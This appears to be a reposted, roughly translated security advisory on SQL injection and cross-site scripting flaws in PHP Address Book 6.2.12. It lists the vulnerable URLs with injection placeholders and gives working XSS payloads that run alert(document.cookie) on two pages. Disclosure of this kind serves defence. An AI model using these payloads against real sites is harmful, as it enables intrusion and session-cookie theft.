PHP Address Book 6.2.12 multiple security flaws and fixes-vulnerability warning-the black bar safety net

ID MYHACK58:62201233332
Type myhack58
Reporter 佚名
Modified 2012-03-13T00:00:00


Author: Stefan Schurtz

Affected Software: Successfully tested on PHP Address Book 6.2.12

Developer URL:

Defect description


PHP Address Book 6.2.12 is containing multiplexssand sql injection issues


The test proved


// Blind /addressbook/edit. php? id=[sql-injection] /addressbook/group. php? add=Add to&group=1&selected%5b%5d=1 3 2&to_group=[sql-injection]

http://[target]/addressbook/vcard. php? id=[sql-injection]

// XSS

http://[target]/addressbook/preferences. php? from='"</script><script>alert(document. cookie)</script>

http://[target]/addressbook/index. php? group='"</script><script>alert(document. cookie)</script>


For the above code to filter the corresponding page